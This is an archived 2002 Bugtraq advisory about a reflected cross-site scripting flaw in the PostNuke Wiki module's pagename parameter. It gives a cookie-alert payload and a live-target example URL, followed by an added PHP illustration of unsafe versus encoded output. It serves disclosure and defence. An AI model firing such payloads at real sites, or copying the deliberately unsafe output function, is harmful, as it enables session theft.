Bugtraq mailing list archives

Wiki module postnuke Cross Site Scripting Vulnerability
From: Pistone <jorgep () spdps com ar>
Date: Tue, 16 Jul 2002 21:49:24 -0300

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------
Class :         Input Validation Error

Risk :            Due to the simplicity of the attack and the number of sites
                   that run phpwiki, the risk is classified as Medium to High.
- ----------------------------------------------------
This wiki is running as a PostNuke module. 
- ------------------------------------

Exploit:         pagename=|script|alert(document.cookie)|/script|

Change | x <>

Working Example :

http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|

- --------------------------------------------------------------------------------------------
The programmer of the wiki module and the admin of postnuke-espanol.org receive a copy of
this report.
- --------------------------------------------------------


Regards

Pistone
- - --------
Http://www.gauchohack.com.ar
Http://www.hackindex.org


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
PlAN98+qigqp8S9pkkfFRm4=
=c2FT
-----END PGP SIGNATURE-----
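
The report above describes the pagename request parameter being reflected into the page without encoding. The following is an added example, not part of the original post and not code from the PostNuke Wiki module, showing the unsafe output pattern beside an encoded one. All function names and the page-name pattern are assumptions made for illustration.

```php
<?php
// Added illustration. Function names and the page-name policy are
// hypothetical; this is not the Wiki module's source.

// Unsafe pattern: the request value is placed into HTML unmodified,
// so any markup it contains is interpreted by the browser.
function render_header_unsafe(string $pagename): string
{
    return '<h1>' . $pagename . '</h1>';
}

// Encode for the HTML context at the point of output.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Allow-list check used before looking a page up (assumed policy:
// letters, digits, space, underscore, dot, hyphen; at most 64 chars).
function is_valid_pagename(string $pagename): bool
{
    return preg_match('/\A[A-Za-z0-9][A-Za-z0-9 _.\-]{0,63}\z/', $pagename) === 1;
}

// Hardened pattern: the name is URL-encoded inside the query string and
// HTML-encoded wherever it appears in markup, including the attribute.
function render_header_safe(string $pagename): string
{
    $href = 'modules.php?op=modload&name=Wiki&file=index&pagename='
          . rawurlencode($pagename);
    return '<h1><a href="' . h($href) . '">' . h($pagename) . '</a></h1>';
}

// Constructed sample inputs; the markup samples are deliberately benign.
$samples = ['HomePage', 'Release Notes', '<b>bold</b>', 'a"b'];

foreach ($samples as $name) {
    printf("input : %s\n", $name);
    printf("valid : %s\n", is_valid_pagename($name) ? 'yes' : 'no');
    printf("unsafe: %s\n", render_header_unsafe($name));
    printf("safe  : %s\n\n", render_header_safe($name));
}
```

Encoding at output is what neutralises the reflected value; the allow-list check only narrows which names are accepted for lookup and does not replace the encoding.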

